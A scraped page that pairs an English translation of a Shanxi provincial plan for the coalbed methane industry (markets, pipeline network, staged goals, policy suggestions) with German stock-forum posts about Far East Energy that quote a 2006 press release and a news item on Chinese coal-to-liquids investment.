3.2.2 Coalbed methane utilization technology has become mature With similar composition like that of natural gas, conversion of coalbed methane can refer to the that for natural gas. By far, natural gas chemical processing technology has become mature and it can serve as a reference by the utilization of coalbed methane. Coalbed methane fired power generation technology has been undergoing small scale experiments for accumulation of more experiences and these have also produced successful result in Jincheng Coal Mining Administration in Shanxi.

3.3 Coalbed methane consumption market is ready in the Province and in the peripheral areas It is predicted on the basis of investigation and analysis that by 2020 the provincial demand for coalbed methane will amount to 7.66 billion m3/a. By 2005, the demand will be about 530 million m3/a and 3.56 billion m3/a by 2010. With the addition of the peripheral areas such as Hebei and Henan as well as the potential fuel gas demands from the provinces and autonomous regions along the route of ¡°western natural gas transmitting to the east¡± project, coalbed methane produced in Shanxi Province will surely have a very promising market.

3.4 The ¡°Western natural gas transmitting to the east¡± project and Shaanxi - Beijing natural gas pipeline project create optimal conditions for the development of coalbed methane industry of Shanxi Gas pipeline network is an important condition for the development of coalbed methane industry. Now, a the Shaanxi - Beijing natural gas pipeline is running through the northern part of Shanxi Province and the ¡°western natural gas transmitting to the eastern part of China¡± project is to run through the central and southern parts of this province. This project will also connect the Hedong and Qinshui coalbed methane fields. Both said projects will serve as links to connect the economic relations between Shanxi Province and the provinces and cities that they run through, hence promoting the development of coalbed methane industry in Shanxi Province.

3.5 Environment for the development of coalbed methane industry is mature Mr. Jiang Zemin, Secretary General of the Chinese Communist Party Central Committee, regards the development and utilization of coalbed methane as an industry by saying ¡°Developing coalbed methane industry by relying on technological advancements to benefit the people¡±. This shows that the central leadership of this country attaches great importance to the development and utilization of coalbed methane. In addition, development of coalbed methane is in conformity with the industrial policy of the nation and the exploration, development and utilization of coalbed methane has been listed in the nation¡¯s development program for the period from the ninth ¡°Five-Year-Plan¡± through 2010 while the construction of relevant pipeline networks has been listed in the agenda of infrastructure construction. All these are now in the process of implementation. Thirdly, many famous foreign companies have been making their contributions in Shanxi Province and their work has laid sound foundations for making a clear list of the inventories of coalbed methane, developing and utilizing coalbed methane in this province. Fourthly, in the national overall coalbed methane development planning, Shanxi Province has been listed as a key province and Qinshui and Hedong coal fields may well hopefully become important coalbed methane bases of this country. Fifthly, Shanxi Provincial Committee of the Chinese Communist Party and Shanxi Provincial government, both of which forming the highest leadership of the Province, attaches great importance to the development and utilization of coalbed methane and hence listed the exploration, development and utilization of coalbed methane in the provincial overall social and economic development program of the ninth ¡°Five-Year-Plan¡± planning. For this, Shanxi Provincial Leadership Group and its Office for CBM comprehensive development and utilization has been set up to take up all responsibilities in this respect. Sixthly, many local authorities and enterprises in Shanxi Province are looking forward to utilizing coalbed methane.

4. The overall planning ideas for coalbed methane industry in Shanxi Province 4.1 Basic ideas Efforts are to be devoted to the development of coalbed methane industry in Shanxi according to the requirements and regularities of socialist market economy for the implementation of sustainable development by taking advantage of the great development of the west part of the nation. The great position and liveliness of Shanxi as the base of energy and heavy chemical industry should be restored again so that Shanxi Province become once again the heat point in the nation¡¯s new energy development and a heat area of the economic development in the middle and western part of this country by intensified R&D activities, fostered exploration and spread application of new technologies.

4.2 Fundamental principles Coalbed methane development and utilization in Shanxi Province shall be carried out in a market-oriented manner assisted by technological advancement and creation of better investment environment. Different ways should be adopted for both domestic and international cooperation under the principle of mutual benefit so as to promote the harmonized social, economic and eco-environmental development.

4.3 Strategic guidlines ¡°Coalbed methane resources is the basis, market is the key. Gradual progress is the foundations for stable development¡±. This is the strategic guidelines for the coalbed methane development and utilization in Shanxi Province. In the actual work tactics, easier and more convenient projects shall be done first so that coalbed methane development and utilization can be promoted starting from large - and medium-sized cities and within the Province to small cities first in - and then outside of the Province. With regard to the sequence of coalbed methane utilization in terms of geographic locations, priority will be given to the central cities where coalbed methane is extracted. Then coalbed methane utilization will be spread to larger cities and finally small cities are to be included for the supply of coalbed methane. Sequence of sectors to utilize coalbed methane is: residential use as fuel gas - industrial fuel gas - chemical industry use - liquefaction.

4.4 Coalbed methane pipeline network planning A total of 4 coalbed methane pipeline networks are planned with 3 running north - east and 1 running north - south. The north line: Xingxian County - Shuoxian County - Datong City. The middle line: Liulin - Jie(xiu)Ping(yao) - Taiyuan - Yangquan - Shijiazhuang. The south line: Yuncheng city - Houma city - Jincheng city - Changzhi - Handan. The central north - south line: Yuanping - Taiyuan - Jiexiu - Yuncheng city. The four coalbed methane pipelines will form a well organized network, forming the shape of a Chinese character of ¡°·á¡± which means abundance.

4.5 Goals in different stages 4.5.1 During the period 2000

2005 In exploration, work is to be improved in the explorations in Qinnan and Liulin areas. At the same times, coalbed methane resources exploration in Gujiao and Shouyang areas are to be started. In pipeline laying, the state trunk pipeline is to be completed, i. e. Liulin - Jie(xiu)Ping(yao) - Hongtong - Linfen - Houma - Jincheng - Jiaozuo pipeline (550km). To go with this trunk line, 2 provincial auxiliary pipelines are to be completed i. e. Jie(xiu)Ping(yao) - Yuci - Taiyuan pipeline (150km) and Jincheng - Changzhi pipeline (95km). During this stage, natural gas will be supplied to the market because coalbed methane will only account for a very limited amount. The key task in this stage is to do a better job in infrastructure construction. 4.5.2 The period 2006

2010 In exploration, coalbed methane extraction bases are to be completed in Qinnan and Liulin areas and gas will be supplied to the pipeline network. At the same time, exploration is to be completed in certain sections in Gujiao and Shouyang areas. In pipeline laying, the following 3 pipelines for CBM supply within Shanxi Province and 2 pipelines for gas supply to neighboring province will be completed. The former 3 pipelines are: Gujiao - Taiyuan pipeline (60km), Shuozhou - Datong pipeline (137km) and Houma - Yuncheng pipeline (80km). The 2 latter pipelines are: Shouyang - Yangquan - Shijiazhuang pipeline and Changzhi - Handan pipeline. During this period, the overall coalbed methane consumption and conversion capacity of the Province will be bettered with the following places as the key areas such as: Taiyuan, Linfen, Houma, Changzhi, Jincheng and some cities along that line. Sectors of major coalbed methane consumption are mainly fuel gas to urban households, industrial fuel gas for metallurgical industries, construction material production and power generation. At the same time, a good job is to be done in coalbed methane compression and liquefaction to facilitate the consumption by the public transport industry in urban areas. Along with the increase of coalbed methane production, fuel gas supplies to the cities such as Shijiazhuang and Handan in Hebei Province to the east can be increased according to the actual conditions.

4.5.3 During the period 2011

2020 In exploration work, coalbed methane production bases with high and stable production rate shall be completed in the entire Hedong and the southern part of Qinshui area. While at the same time, coalbed methane production base shall take shape in Gujiao and Shouyang areas. In pipeline laying, other pipelines shall be laid starting from Taiyuan city and running northward, i. e. the line Taiyuan - Xinzhou - Yuanping (111km) and the pipeline Xingxian - Baode (75km). By then, the backbone coalbed methane pipeline network in Shanxi Province will take shape. During this period, the entire coalbed methane consumption and conversion capacity of Shanxi Province will be 7.66 billion m3/a. All of the large - and medium-sized cities in Shanxi and towns along the pipelines will be supplied with coalbed methane. In addition to its consumption as fuel gas by urban households, more coalbed methane will be consumed by industrial sectors. Coalbed methane consumption by the fine chemical industries will increase to 1.8 billion m3/a. By that time, the energy structure of Shanxi Province will experience fundamental changes and it is well realistic that the sky may become blue and water clear again in the province of Shanxi.

5. Policy suggestions As an emerging industry and a morning sun industry, coalbed methane industry needs careful cultivation and support. On the basis of these considerations, the following suggestions are submitted for the preparation of relevant policies: 5.1 With rich coalbed methane resources in this country, the development of coalbed methane industry will undoubtedly present an important impact on the improvement of the national social, economic and environmental development. We suggest that the state government work out as soon as possible an overall coalbed methane development program with Shanxi Province as the key component. This program shall be included in the national development program for the tenth ¡°Five-Year-Plan¡± for implementation. 5.2 Shanxi Province has very rich coalbed methane resources which is of high quality with great development prospects. Over the recent years, large amount of work has been carried out in Shanxi Province in basic survey and investigations. Experimental development and utilization have also been carried out in a certain range and many experiences have been accumulated as a result. We suggest that the state government make the Province of Shanxi a demonstration region for the development of coalbed methane industry. 5.3 Shanxi Province is just in the starting stage of coalbed methane development and it is natural that it is in bad needs of funds to start several coalbed methane demonstration projects. We suggest that the state government put in appropriate amount of funds in Shanxi Province to increase investment into the construction of infrastructures in this province, implement a preferential loan inclination policy and implement zero-rate to the investment orientation adjustment tax. We also suggest that in taxation, policies for off-shore oil and off-shore natural gas development be referred to to give preferential treatment of income tax reduction or income tax exemption to coalbed methane industry within 5

10 years after its coming into being. 5.4 In making the overall planning for the long distance natural gas transmission pipelines, careful consideration should also be given to the plans for the construction of coalbed methane pipeline network so that the Shanxi pipeline be merged into the national pipeline network. 5.5 We suggest that Shanxi coalbed methane industry development foundation be set up while considring that the financing be solved out of the cooperation with governments, non-governmental organizations from either within or outside of Shanxi Province and this country. In case of availability of permitting conditions, considerations should also be given to the possibility of going public for financing. 5.6 Every effort should be made to improve the investment environment, work out relevant preferential policies, intensify the technical and economic links with large enterprises and financial institutions from both home and abroad. Cooperation can by in multi-mode either by joint venture or cooperation in other forms to finally speed up the coalbed methane industry development in Shanxi Province. 5.7 In these entire processes, it is very important to identify, select and cultivate special professional from wide possible source and to set up research institutions centering around coalbed methane development and utilization. More attention should be given to the R&D activities on special applied soft-wares, instruments, mechanical equipment and other relevant apparatuses so as to put them into production. It is our lofty goal to turn Shanxi Province into the ¡°Silicon Valley¡± in coalbed methane development in this country.

Beitrag Nr. 45 ( 25.563.803 )

Keine Ahnung ob ich was falsch in den Hals bekommen habe, aber die nächsten Monate sollen noch 4 wells fertig gestellt werden. So die Nachricht vom 10.10.2006 http://www. china5e. com/news/oil/200610/200610100287.html

Das hieße es könnte bald los gehen, oder wir sehen noch tiefere Kurse bis zum Februar, falls keine Durchflussraten mit absicht bekannt gegeben werden.

Das HZ04 horizontal drilling wurde jetzt fertiggestellt bzw. in Anführungsstrichen da ja die Folgenden wells dieses loch durchbohren werden.

Far East Energy, said the company plans to conduct drilling in the FCC HZ05 HZ04 drilling horizontal wells in this drilling to upgrade to a gas production potential.

Es kann durchaus sein das wir noch die 0,63 sehen werden bis zur HV. Der Tag gestern läßt zumindestens darauf schließen. Man konnte beobachten das durchweg shortis on board waren. Die meisten Positionen wurden noch am selben Tag wieder glattgestellt oder hier billig eingekauft und drüben an der OTC denn Meistbietenden verhöckert.

Aber da ihr ja alle so gut aufpaßt wisst ihr das bereits, ich bin übrigens stark überrascht von einigen, sie haben Sofar als das Schwarze Scharf enttarnt. Lob von meiner Seite

Beitrag Nr. 51 ( 26.216.502 )

Das Management scheint es jetzt kapiert zu haben, das nicht alle so begeistert von der Performance waren.

December 15, 2006 Far East Energy Holds Annual Meeting Of Stockholders

Company Looks Forward to Report From The Independent Inspectors of Election

HOUSTON, Texas -- Far East Energy Corporation (OTC Bulletin Board: FEEC) said that the Annual Meeting of Stockholders was held today in Houston. Far East said it looks forward to the report from the Independent Inspectors of Election and is confident that when the preliminary results become available, they will show that our Director nominees have been elected.

"We would like to thank our stockholders for showing their support of our highly qualified director nominees," said Michael R. McElwrath, CEO and President of Far East. "Our nominees are committed to increasing stockholder value and we will work hard on behalf of all of our stockholders to deliver upon the great potential of our projects in China.

We have heard a strong message from our stockholders to continue our critical drilling efforts in China and we look forward to continuing our program of enhanced stockholder communications."

Mr. McElwrath continued, "Our directors have a strong mix of financial acumen, senior management experience, and over 170 years of combined energy industry background. Combine that with their long-standing relationships with the Chinese government and the Chinese energy industry, and our directors are an invaluable asset in seeking to develop a complex coalbed methane project in partnership with the Chinese."

About Far East Energy

Based in Houston, Texas, with offices in Beijing, Kunming, and Taiyuan City, China, Far East Energy Corporation is focused on the acquisition of, and exploration for, coalbed methane in China through its agreements with ConocoPhillips and China United Coalbed Methane Corp. Ltd. (CUCBM).

Beitrag Nr. 52 ( 26.307.379 )

BEIJING, Dec 15, 2006 (AsiaPulse via COMTEX) -- China will invest over one trillion yuan (US$128 billion) in developing an alternative coal-based energy source to ease the country's dependence on oil imports, according to the National Development and Reform Commission (NDRC).

The project aims to produce 30 million tons of liquefied coal and 20 million tons of dimethyl ether (DME) by 2020.

Coal-to-olefin (CTO) output is expected to hit 8 million tons and coal methanol to reach 66 million tons.

Traditional coal-chemical industries that have been guilty of overproduction, such as calcium carbide and coke, will be kept under control.

The money will also be spent on building seven industrial bases nationwide to produce coal-based energy source on a massive scale, including the biggest alternative fuel production base in the lower reaches of the Yellow River.

Xinjiang is projected to produce 10 million tons of liquefied coal, and the eastern region of Inner Mongolia will become the major methanol supplier, with an annual capacity of 10 million tons.

A pipeline, at a cost of five billion yuan, will be built to transport 10 million tons of methanol a year from Inner Mogolia to the northeastern Liaoning province. As the technology is still in the experimental phase, the NDRC said in July that coal liquefaction projects should not be approved until a national development program for the industry is completed, Coal-chemical projects must meet environmental requirements and those that fail to meet the safety requirements in transportation should not receive the green light, said the NDRC


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